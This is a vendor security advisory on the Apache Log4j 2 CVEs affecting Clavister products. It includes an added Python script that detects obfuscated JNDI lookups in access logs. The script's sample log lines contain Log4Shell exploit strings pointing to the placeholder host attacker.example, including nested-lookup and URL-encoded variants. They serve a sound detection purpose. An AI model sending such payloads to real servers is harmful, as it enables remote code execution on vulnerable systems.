CLAV-SA-0297 High Severity vulnerability in Apache Log4J 2
Summary: High Severity vulnerability in Apache Log4J 2
Log4j 2 is used in Clavister's EasyAccess, EasyPassword and InCenter products and must be reconfigured or patched so that it is no longer susceptible to the following vulnerabilities.
- CVE-2021-44228: Log4j's JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution. For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44228
- CVE-2021-45046: The Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-45046
- CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation. For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-45105
- CVE-2021-44832: Apache Log4j2 is vulnerable to RCE via the JDBC Appender when an attacker controls the configuration. For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
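As an added example (not part of Clavister's advisory), the following Python check flags access-log lines that carry the JNDI lookup pattern behind CVE-2021-44228, including the nested-lookup and URL-encoded forms that defeat a plain substring search for "jndi". The log lines and the host name attacker.example are constructed.

```python
import re
from urllib.parse import unquote

# Nested lookups that each resolve to one literal character are used to hide the
# keyword "jndi" from naive substring matching: ${lower:X}/${upper:X} change case,
# and ${name:-X} is the default value of an undefined lookup (e.g. ${::-j}).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse innermost obfuscating lookups until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        step = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            text,
        )
        step = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), step)
        if step == text:  # nothing left to resolve
            break
        text = step
    return text

def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI_LOOKUP.search(normalize(line)) is not None

def scan(lines):
    """Return the 1-based numbers of the lines that should be investigated."""
    return [n for n, line in enumerate(lines, start=1) if is_suspicious(line)]

# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://attacker.example/a}"',
    '10.0.0.11 - - [10/Dec/2021:14:02:17 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n in scan(SAMPLE_LOG):
        print(f"line {n}: {SAMPLE_LOG[n - 1]}")
```

Only the first sample line is clean; the other three are reported, which is the result a plain search for the literal string "jndi" would miss for lines 3 and 4.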
The following products are affected:
- EasyAccess <= 4.1.2
- InCenter <= 1.68.03, 2.0.0 and 2.1.0
The following products do not use any Java components at all and are therefore not (and have never been) vulnerable to these Log4j 2 vulnerabilities:
- Clavister NetWall (cOS Core)
- Clavister NetShield (cOS Stream)
- Clavister InControl
- Clavister OneConnect
Clavister IDP can be used to mitigate these attacks on non-encrypted traffic. See https://www.clavister.com/advisories/idp/?Query=CVE-2021-44228 for details on which signatures to use, and https://kb.clavister.com/343410414/protecting-against-the-apache-log4j-exploit for detailed information.
For EasyAccess please refer to https://kb.clavister.com/343410234/high-severity-vulnerability-in-apache-log4j-2 for detailed information.
For InCenter please refer to https://kb.clavister.com/343410462/vulnerability-in-apache-log4j-2-which-is-used-in-incenter for detailed information.
Updated versions will be published at https://www.clavister.com/ as soon as they are ready.
We are continuously updating this advisory as more information becomes available.